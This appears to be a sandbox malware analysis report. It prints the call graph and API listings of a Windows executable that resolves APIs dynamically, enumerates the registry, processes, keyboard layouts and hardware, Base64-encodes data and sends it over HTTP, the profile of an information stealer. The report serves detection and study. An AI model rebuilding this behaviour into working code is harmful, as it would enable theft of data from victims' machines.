lstrcpy 68726->68727 68728 411f4b 68727->68728 68729 41a380 4 API calls 68728->68729 68730 411f6c 68729->68730 68731 41a270 lstrcpy 68730->68731 68732 411f75 68731->68732 68733 41a380 4 API calls 68732->68733 68734 411f94 68733->68734 68735 41a270 lstrcpy 68734->68735 68736 411f9d 68735->68736 68737 41a380 4 API calls 68736->68737 68738 411fbe 68737->68738 68739 41a270 lstrcpy 68738->68739 68740 411fc7 68739->68740 69209 417dc0 68740->69209 68742 411fe3 68743 41a2f0 3 API calls 68742->68743 68744 411ff6 68743->68744 68745 41a270 lstrcpy 68744->68745 68746 411fff 68745->68746 68747 41a380 4 API calls 68746->68747 68748 412029 68747->68748 68749 41a270 lstrcpy 68748->68749 68750 412032 68749->68750 68751 41a380 4 API calls 68750->68751 68752 412053 68751->68752 68753 41a270 lstrcpy 68752->68753 68754 41205c 68753->68754 68755 417dc0 17 API calls 68754->68755 68756 412078 68755->68756 68757 41a2f0 3 API calls 68756->68757 68758 41208b 68757->68758 68759 41a270 lstrcpy 68758->68759 68760 412094 68759->68760 68761 41a380 4 API calls 68760->68761 68762 4120be 68761->68762 68763 41a270 lstrcpy 68762->68763 68764 4120c7 68763->68764 68765 41a380 4 API calls 68764->68765 68766 4120e6 68765->68766 68767 41a270 lstrcpy 68766->68767 68768 4120ef 68767->68768 68769 41a380 4 API calls 68768->68769 68770 412110 68769->68770 68771 41a270 lstrcpy 68770->68771 68772 412119 68771->68772 69245 418120 68772->69245 68774 412130 68775 41a2f0 3 API calls 68774->68775 68776 412143 68775->68776 68777 41a270 lstrcpy 68776->68777 68778 41214c 68777->68778 68779 41216a lstrlenA 68778->68779 68780 41217a 68779->68780 68781 41a110 lstrcpy 68780->68781 68782 41218c 68781->68782 68783 401590 lstrcpy 68782->68783 68784 41219d 68783->68784 69255 414c70 68784->69255 68786 4121a9 68786->67202 69451 41a4a0 68787->69451 68789 405059 InternetOpenUrlA 68793 405071 68789->68793 68790 4050f0 InternetCloseHandle InternetCloseHandle 68792 40513c 68790->68792 68791 40507a InternetReadFile 68791->68793 68792->67206 68793->68790 68793->68791 68794 4050c0 KiUserExceptionDispatcher 68793->68794 68794->68793 69452 409920 68795->69452 69081 41a170 lstrcpy 69080->69081 69082 4016c3 69081->69082 69083 41a170 lstrcpy 69082->69083 69084 4016d5 69083->69084 69085 41a170 lstrcpy 69084->69085 69086 4016e7 69085->69086 69087 41a170 lstrcpy 69086->69087 69088 4015a3 69087->69088 69088->68033 69117 401030 69089->69117 69093 404888 lstrlenA 69120 41a4a0 69093->69120 69095 404898 InternetCrackUrlA 69096 4048b7 69095->69096 69096->68110 69098 409b49 LocalAlloc 69097->69098 69099 404f3e 69097->69099 69098->69099 69100 409b64 CryptStringToBinaryA 69098->69100 69099->68132 69099->68134 69100->69099 69101 409b89 LocalFree 69100->69101 69101->69099 69103 41a110 lstrcpy 69102->69103 69104 418614 69103->69104 69105 41a110 lstrcpy 69104->69105 69106 418622 GetSystemTime 69105->69106 69109 418639 69106->69109 69107 41a170 lstrcpy 69108 41869c 69107->69108 69108->68126 69109->69107 69111 41a301 69110->69111 69112 41a358 69111->69112 69114 41a338 lstrcpy lstrcat 69111->69114 69113 41a170 lstrcpy 69112->69113 69115 41a364 69113->69115 69114->69112 69115->68129 69116->68244 69118 40103a ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 69117->69118 69119 41a4a0 69118->69119 69119->69093 69120->69095 69121->68254 69122->68399 69123->68401 69124->68403 69125->68405 69126->68409 69127->68411 69128->68420 69129->68427 69130->68437 69262 417240 69131->69262 69134 417166 RegOpenKeyExA 69136 4171a4 RegCloseKey 69134->69136 69137 417187 RegQueryValueExA 69134->69137 69135 41172e 69135->68502 69136->69135 69137->69136 69139 4117a9 69138->69139 69139->68516 69141 411919 69140->69141 69141->68558 69143 411994 69142->69143 69144 41753a wsprintfA 69142->69144 69143->68572 69144->69143 69146 411a0e 69145->69146 69147 4175ed 69145->69147 69146->68586 69269 4187c0 LocalAlloc CharToOemW 69147->69269 69149 4175f9 69149->69146 69151 41a110 lstrcpy 69150->69151 69152 41766c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 69151->69152 69161 4176c5 69152->69161 69153 4176e6 GetLocaleInfoA 69153->69161 69154 4177b8 69155 4177c8 69154->69155 69156 4177be LocalFree 69154->69156 69158 41a170 lstrcpy 69155->69158 69156->69155 69157 41a380 lstrcpy lstrlenA lstrcpy lstrcat 69157->69161 69160 4177d7 69158->69160 69159 41a270 lstrcpy 69159->69161 69160->68599 69161->69153 69161->69154 69161->69157 69161->69159 69163 411b18 69162->69163 69163->68614 69165 418f33 K32GetModuleFileNameExA CloseHandle 69164->69165 69166 418f55 69164->69166 69165->69166 69167 41a110 lstrcpy 69166->69167 69168 411ba1 69167->69168 69168->68629 69170 411c29 69169->69170 69171 417908 RegQueryValueExA 69169->69171 69170->68643 69172 41792e RegCloseKey 69171->69172 69172->69170 69174 417a59 GetLogicalProcessorInformationEx 69173->69174 69175 417a78 GetLastError 69174->69175 69183 417ac9 69174->69183 69176 417a83 69175->69176 69177 417ac2 69175->69177 69178 417a8c 69176->69178 69187 411ca4 69177->69187 69273 418490 GetProcessHeap HeapFree 69177->69273 69178->69174 69185 417ab6 69178->69185 69270 418490 GetProcessHeap HeapFree 69178->69270 69271 4184b0 GetProcessHeap HeapAlloc 69178->69271 69272 418490 GetProcessHeap HeapFree 69183->69272 69184 417b1b 69186 417b24 wsprintfA 69184->69186 69184->69187 69185->69187 69186->69187 69187->68657 69189 411d1f 69188->69189 69189->68671 69191 418450 69190->69191 69192 417bed GlobalMemoryStatusEx 69191->69192 69195 417c03 __aulldiv 69192->69195 69193 417c3b wsprintfA 69194 411d99 69193->69194 69194->68685 69195->69193 69197 41829b GetProcessHeap HeapAlloc wsprintfA 69196->69197 69199 41a110 lstrcpy 69197->69199 69200 411e1b 69199->69200 69200->68699 69202 41a110 lstrcpy 69201->69202 69208 417cc9 69202->69208 69203 417d03 69204 41a170 lstrcpy 69203->69204 69206 417d7c 69204->69206 69205 41a380 lstrcpy lstrlenA lstrcpy lstrcat 69205->69208 69206->68716 69207 41a270 lstrcpy 69207->69208 69208->69203 69208->69205 69208->69207 69210 41a110 lstrcpy 69209->69210 69211 417dfc RegOpenKeyExA 69210->69211 69212 417e70 69211->69212 69213 417e4e 69211->69213 69215 4180b3 RegCloseKey 69212->69215 69216 417e98 RegEnumKeyExA 69212->69216 69214 41a170 lstrcpy 69213->69214 69226 417e5d 69214->69226 69219 41a170 lstrcpy 69215->69219 69217 417edf wsprintfA RegOpenKeyExA 69216->69217 69218 4180ae 69216->69218 69220 417f61 RegQueryValueExA 69217->69220 69221 417f25 RegCloseKey RegCloseKey 69217->69221 69218->69215 69219->69226 69223 4180a1 RegCloseKey 69220->69223 69224 417f9a lstrlenA 69220->69224 69222 41a170 lstrcpy 69221->69222 69222->69226 69223->69218 69224->69223 69225 417fb0 69224->69225 69227 41a380 4 API calls 69225->69227 69226->68742 69228 417fc7 69227->69228 69229 41a270 lstrcpy 69228->69229 69230 417fd3 69229->69230 69231 41a380 4 API calls 69230->69231 69232 417ff7 69231->69232 69233 41a270 lstrcpy 69232->69233 69234 418003 69233->69234 69235 41800e RegQueryValueExA 69234->69235 69235->69223 69236 418043 69235->69236 69237 41a380 4 API calls 69236->69237 69238 41805a 69237->69238 69239 41a270 lstrcpy 69238->69239 69240 418066 69239->69240 69241 41a380 4 API calls 69240->69241 69242 41808a 69241->69242 69243 41a270 lstrcpy 69242->69243 69244 418096 69243->69244 69244->69223 69246 41a110 lstrcpy 69245->69246 69247 41815c CreateToolhelp32Snapshot Process32First 69246->69247 69248 418188 Process32Next 69247->69248 69249 4181fd CloseHandle 69247->69249 69248->69249 69254 41819d 69248->69254 69250 41a170 lstrcpy 69249->69250 69252 418216 69250->69252 69251 41a380 lstrcpy lstrlenA lstrcpy lstrcat 69251->69254 69252->68774 69253 41a270 lstrcpy 69253->69254 69254->69248 69254->69251 69254->69253 69256 41a170 lstrcpy 69255->69256 69257 414c95 69256->69257 69258 401590 lstrcpy 69257->69258 69259 414ca6 69258->69259 69274 405150 69259->69274 69261 414caf 69261->68786 69265 4171c0 GetProcessHeap HeapAlloc RegOpenKeyExA 69262->69265 69264 417159 69264->69134 69264->69135 69266 417220 RegCloseKey 69265->69266 69267 417205 RegQueryValueExA 69265->69267 69268 417233 69266->69268 69267->69266 69268->69264 69269->69149 69270->69178 69271->69178 69272->69184 69273->69187 69275 41a170 lstrcpy 69274->69275 69276 405169 69275->69276 69277 404800 5 API calls 69276->69277 69278 405175 69277->69278 69437 418940 69278->69437 69280 4051d4 69281 4051e2 lstrlenA 69280->69281 69282 4051f5 69281->69282 69283 418940 4 API calls 69282->69283 69284 405206 69283->69284 69285 41a110 lstrcpy 69284->69285 69286 405219 69285->69286 69287 41a110 lstrcpy 69286->69287 69288 405226 69287->69288 69289 41a110 lstrcpy 69288->69289 69290 405233 69289->69290 69291 41a110 lstrcpy 69290->69291 69292 405240 69291->69292 69293 41a110 lstrcpy 69292->69293 69294 40524d InternetOpenA StrCmpCA 69293->69294 69295 40527f 69294->69295 69296 405290 69295->69296 69297 405914 InternetCloseHandle 69295->69297 69298 418600 3 API calls 69296->69298 69304 405929 ctype 69297->69304 69299 40529e 69298->69299 69300 41a2f0 3 API calls 69299->69300 69301 4052b1 69300->69301 69302 41a270 lstrcpy 69301->69302 69303 4052ba 69302->69303 69305 41a380 4 API calls 69303->69305 69307 41a170 lstrcpy 69304->69307 69306 4052fb 69305->69306 69308 41a2f0 3 API calls 69306->69308 69315 405963 69307->69315 69309 405302 69308->69309 69310 41a380 4 API calls 69309->69310 69311 405309 69310->69311 69312 41a270 lstrcpy 69311->69312 69313 405312 69312->69313 69314 41a380 4 API calls 69313->69314 69316 405353 69314->69316 69315->69261 69317 41a2f0 3 API calls 69316->69317 69318 40535a 69317->69318 69319 41a270 lstrcpy 69318->69319 69320 405363 69319->69320 69321 405379 InternetConnectA 69320->69321 69321->69297 69322 4053a9 HttpOpenRequestA 69321->69322 69438 418949 69437->69438 69439 41894d CryptBinaryToStringA 69437->69439 69438->69280 69439->69438 69440 41896e GetProcessHeap HeapAlloc 69439->69440 69441 418990 69440->69441 69442 418994 ctype 69440->69442 69441->69438 69443 4189a5 CryptBinaryToStringA 69442->69443 69443->69441 69451->68789 69703 4098d0 ??2@YAPAXI 69452->69703 69706 407000 69703->69706 69709 406d90 69706->69709 70909 6ca3c930 GetSystemInfo VirtualAlloc 70910 6ca3c9a3 GetSystemInfo 70909->70910 70911 6ca3c973 70909->70911 70913 6ca3c9d0 70910->70913 70914 6ca3c9b6 70910->70914 70925 6ca5b320 5 API calls ___raise_securityfailure 70911->70925 70913->70911 70917 6ca3c9d8 VirtualAlloc 70913->70917 70914->70913 70916 6ca3c9bd 70914->70916 70915 6ca3c99b 70916->70911 70918 6ca3c9c1 VirtualFree 70916->70918 70919 6ca3c9f0 70917->70919 70920 6ca3c9ec 70917->70920 70918->70911 70926 6ca5cbe8 GetCurrentProcess TerminateProcess 70919->70926 70920->70911 70925->70915 70927 6ca5b9c0 70928 6ca5b9ce dllmain_dispatch 70927->70928 70929 6ca5b9c9 70927->70929 70931 6ca5bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 70929->70931 70931->70928 70932 6ca5b8ae 70935 6ca5b8ba ___scrt_is_nonwritable_in_current_image 70932->70935 70933 6ca5b8c9 70934 6ca5b8e3 dllmain_raw 70934->70933 70937 6ca5b8fd dllmain_crt_dispatch 70934->70937 70935->70933 70935->70934 70936 6ca5b8de 70935->70936 70945 6ca3bed0 DisableThreadLibraryCalls LoadLibraryExW 70936->70945 70937->70933 70937->70936 70939 6ca5b91e 70941 6ca5b94a 70939->70941 70946 6ca3bed0 DisableThreadLibraryCalls LoadLibraryExW 70939->70946 70940 6ca5b953 dllmain_crt_dispatch 70940->70933 70943 6ca5b966 dllmain_raw 70940->70943 70941->70933 70941->70940 70943->70933 70944 6ca5b936 dllmain_crt_dispatch dllmain_raw 70944->70941 70945->70939 70946->70944

                                                                                          Executed Functions

                                                                                          Function 004195E0 Relevance: 203.7, APIs: 112, Strings: 4, Instructions: 684libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 633 4195e0-4195ea 634 4195f0-419a01 GetProcAddress * 43 633->634 635 419a06-419a9a LoadLibraryA * 8 633->635 634->635 636 419b16-419b1d 635->636 637 419a9c-419b11 GetProcAddress * 5 635->637 638 419b23-419be1 GetProcAddress * 8 636->638 639 419be6-419bed 636->639 637->636 638->639 640 419c68-419c6f 639->640 641 419bef-419c63 GetProcAddress * 5 639->641 642 419c75-419d02 GetProcAddress * 6 640->642 643 419d07-419d0e 640->643 641->640 642->643 644 419d14-419dea GetProcAddress * 9 643->644 645 419def-419df6 643->645 644->645 646 419e72-419e79 645->646 647 419df8-419e6d GetProcAddress * 5 645->647 648 419e7b-419ea7 GetProcAddress * 2 646->648 649 419eac-419eb3 646->649 647->646 648->649 650 419ee5-419eec 649->650 651 419eb5-419ee0 GetProcAddress * 2 649->651 652 419fe2-419fe9 650->652 653 419ef2-419fdd GetProcAddress * 10 650->653 651->650 654 419feb-41a048 GetProcAddress * 4 652->654 655 41a04d-41a054 652->655 653->652 654->655 656 41a056-41a069 GetProcAddress 655->656 657 41a06e-41a075 655->657 656->657 658 41a077-41a0d3 GetProcAddress * 4 657->658 659 41a0d8-41a0d9 657->659 658->659
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(76210000,00814918), ref: 004195FD
                                                                                          • GetProcAddress.KERNEL32(76210000,00814718), ref: 00419615
                                                                                          • GetProcAddress.KERNEL32(76210000,00817030), ref: 0041962E
                                                                                          • GetProcAddress.KERNEL32(76210000,00817060), ref: 00419646
                                                                                          • GetProcAddress.KERNEL32(76210000,00816DD8), ref: 0041965E
                                                                                          • GetProcAddress.KERNEL32(76210000,00816DF0), ref: 00419677
                                                                                          • GetProcAddress.KERNEL32(76210000,00815C10), ref: 0041968F
                                                                                          • GetProcAddress.KERNEL32(76210000,008170D8), ref: 004196A7
                                                                                          • GetProcAddress.KERNEL32(76210000,008170F0), ref: 004196C0
                                                                                          • GetProcAddress.KERNEL32(76210000,00817108), ref: 004196D8
                                                                                          • GetProcAddress.KERNEL32(76210000,00817120), ref: 004196F0
                                                                                          • GetProcAddress.KERNEL32(76210000,00814818), ref: 00419709
                                                                                          • GetProcAddress.KERNEL32(76210000,008147B8), ref: 00419721
                                                                                          • GetProcAddress.KERNEL32(76210000,00814758), ref: 00419739
                                                                                          • GetProcAddress.KERNEL32(76210000,00814558), ref: 00419752
                                                                                          • GetProcAddress.KERNEL32(76210000,00817138), ref: 0041976A
                                                                                          • GetProcAddress.KERNEL32(76210000,00817150), ref: 00419782
                                                                                          • GetProcAddress.KERNEL32(76210000,008157B0), ref: 0041979B
                                                                                          • GetProcAddress.KERNEL32(76210000,00814838), ref: 004197B3
                                                                                          • GetProcAddress.KERNEL32(76210000,00817168), ref: 004197CB
                                                                                          • GetProcAddress.KERNEL32(76210000,00817180), ref: 004197E4
                                                                                          • GetProcAddress.KERNEL32(76210000,00817198), ref: 004197FC
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A610), ref: 00419814
                                                                                          • GetProcAddress.KERNEL32(76210000,00814778), ref: 0041982D
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A580), ref: 00419845
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A5B0), ref: 0041985D
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A628), ref: 00419876
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A598), ref: 0041988E
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A568), ref: 004198A6
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A5C8), ref: 004198BF
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A5E0), ref: 004198D7
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A5F8), ref: 004198EF
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A4A8), ref: 00419908
                                                                                          • GetProcAddress.KERNEL32(76210000,007F14C0), ref: 00419920
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A4D8), ref: 00419938
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A3A0), ref: 00419951
                                                                                          • GetProcAddress.KERNEL32(76210000,008147D8), ref: 00419969
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A2C8), ref: 00419981
                                                                                          • GetProcAddress.KERNEL32(76210000,00814598), ref: 0041999A
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A2F8), ref: 004199B2
                                                                                          • GetProcAddress.KERNEL32(76210000,0081A3E8), ref: 004199CA
                                                                                          • GetProcAddress.KERNEL32(76210000,00814618), ref: 004199E3
                                                                                          • GetProcAddress.KERNEL32(76210000,008145B8), ref: 004199FB
                                                                                          • LoadLibraryA.KERNEL32(0081A310,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
                                                                                          • LoadLibraryA.KERNEL32(0081A478,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
                                                                                          • LoadLibraryA.KERNEL32(0081A2E0,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A30
                                                                                          • LoadLibraryA.KERNEL32(0081A328,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
                                                                                          • LoadLibraryA.KERNEL32(0081A508,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A53
                                                                                          • LoadLibraryA.KERNEL32(0081A268,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A65
                                                                                          • LoadLibraryA.KERNEL32(0081A280,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
                                                                                          • LoadLibraryA.KERNEL32(0081A550,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
                                                                                          • GetProcAddress.KERNEL32(751E0000,008145D8), ref: 00419AAA
                                                                                          • GetProcAddress.KERNEL32(751E0000,0081A418), ref: 00419AC2
                                                                                          • GetProcAddress.KERNEL32(751E0000,00816B80), ref: 00419ADA
                                                                                          • GetProcAddress.KERNEL32(751E0000,0081A340), ref: 00419AF3
                                                                                          • GetProcAddress.KERNEL32(751E0000,00814A78), ref: 00419B0B
                                                                                          • GetProcAddress.KERNEL32(70150000,00815B48), ref: 00419B30
                                                                                          • GetProcAddress.KERNEL32(70150000,00814CF8), ref: 00419B49
                                                                                          • GetProcAddress.KERNEL32(70150000,00815A30), ref: 00419B61
                                                                                          • GetProcAddress.KERNEL32(70150000,0081A4F0), ref: 00419B79
                                                                                          • GetProcAddress.KERNEL32(70150000,0081A538), ref: 00419B92
                                                                                          • GetProcAddress.KERNEL32(70150000,00814AD8), ref: 00419BAA
                                                                                          • GetProcAddress.KERNEL32(70150000,00814AF8), ref: 00419BC2
                                                                                          • GetProcAddress.KERNEL32(70150000,0081A2B0), ref: 00419BDB
                                                                                          • GetProcAddress.KERNEL32(753A0000,00814978), ref: 00419BFC
                                                                                          • GetProcAddress.KERNEL32(753A0000,00814A98), ref: 00419C14
                                                                                          • GetProcAddress.KERNEL32(753A0000,0081A358), ref: 00419C2D
                                                                                          • GetProcAddress.KERNEL32(753A0000,0081A3D0), ref: 00419C45
                                                                                          • GetProcAddress.KERNEL32(753A0000,00814CB8), ref: 00419C5D
                                                                                          • GetProcAddress.KERNEL32(76310000,008159E0), ref: 00419C83
                                                                                          • GetProcAddress.KERNEL32(76310000,00815C60), ref: 00419C9B
                                                                                          • GetProcAddress.KERNEL32(76310000,0081A430), ref: 00419CB3
                                                                                          • GetProcAddress.KERNEL32(76310000,00814AB8), ref: 00419CCC
                                                                                          • GetProcAddress.KERNEL32(76310000,00814B18), ref: 00419CE4
                                                                                          • GetProcAddress.KERNEL32(76310000,008158F0), ref: 00419CFC
                                                                                          • GetProcAddress.KERNEL32(76910000,0081A370), ref: 00419D22
                                                                                          • GetProcAddress.KERNEL32(76910000,008149F8), ref: 00419D3A
                                                                                          • GetProcAddress.KERNEL32(76910000,00816B90), ref: 00419D52
                                                                                          • GetProcAddress.KERNEL32(76910000,0081A388), ref: 00419D6B
                                                                                          • GetProcAddress.KERNEL32(76910000,0081A448), ref: 00419D83
                                                                                          • GetProcAddress.KERNEL32(76910000,00814958), ref: 00419D9B
                                                                                          • GetProcAddress.KERNEL32(76910000,00814998), ref: 00419DB4
                                                                                          • GetProcAddress.KERNEL32(76910000,0081A460), ref: 00419DCC
                                                                                          • GetProcAddress.KERNEL32(76910000,0081A400), ref: 00419DE4
                                                                                          • GetProcAddress.KERNEL32(75B30000,00814A18), ref: 00419E06
                                                                                          • GetProcAddress.KERNEL32(75B30000,0081A3B8), ref: 00419E1E
                                                                                          • GetProcAddress.KERNEL32(75B30000,0081A490), ref: 00419E36
                                                                                          • GetProcAddress.KERNEL32(75B30000,0081A4C0), ref: 00419E4F
                                                                                          • GetProcAddress.KERNEL32(75B30000,0081A520), ref: 00419E67
                                                                                          • GetProcAddress.KERNEL32(75670000,008149B8), ref: 00419E88
                                                                                          • GetProcAddress.KERNEL32(75670000,00814B78), ref: 00419EA1
                                                                                          • GetProcAddress.KERNEL32(76AC0000,00814B98), ref: 00419EC2
                                                                                          • GetProcAddress.KERNEL32(76AC0000,0081A298), ref: 00419EDA
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814B38), ref: 00419F00
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814C98), ref: 00419F18
                                                                                          • GetProcAddress.KERNEL32(6F500000,008149D8), ref: 00419F30
                                                                                          • GetProcAddress.KERNEL32(6F500000,0081ABF8), ref: 00419F49
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814A38), ref: 00419F61
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814A58), ref: 00419F79
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814CD8), ref: 00419F92
                                                                                          • GetProcAddress.KERNEL32(6F500000,00814BB8), ref: 00419FAA
                                                                                          • GetProcAddress.KERNEL32(6F500000,InternetSetOptionA), ref: 00419FC1
                                                                                          • GetProcAddress.KERNEL32(6F500000,HttpQueryInfoA), ref: 00419FD7
                                                                                          • GetProcAddress.KERNEL32(75AE0000,0081AB08), ref: 00419FF9
                                                                                          • GetProcAddress.KERNEL32(75AE0000,00816A60), ref: 0041A011
                                                                                          • GetProcAddress.KERNEL32(75AE0000,0081AB20), ref: 0041A029
                                                                                          • GetProcAddress.KERNEL32(75AE0000,0081AB80), ref: 0041A042
                                                                                          • GetProcAddress.KERNEL32(76300000,00814B58), ref: 0041A063
                                                                                          • GetProcAddress.KERNEL32(6E7F0000,0081AB38), ref: 0041A084
                                                                                          • GetProcAddress.KERNEL32(6E7F0000,00814BD8), ref: 0041A09D
                                                                                          • GetProcAddress.KERNEL32(6E7F0000,0081AC10), ref: 0041A0B5
                                                                                          • GetProcAddress.KERNEL32(6E7F0000,0081AB50), ref: 0041A0CD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
                                                                                          • API String ID: 2238633743-3014924196
                                                                                          • Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
                                                                                          • Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
                                                                                          • Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
                                                                                          • Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4
                                                                                          Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
                                                                                          • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
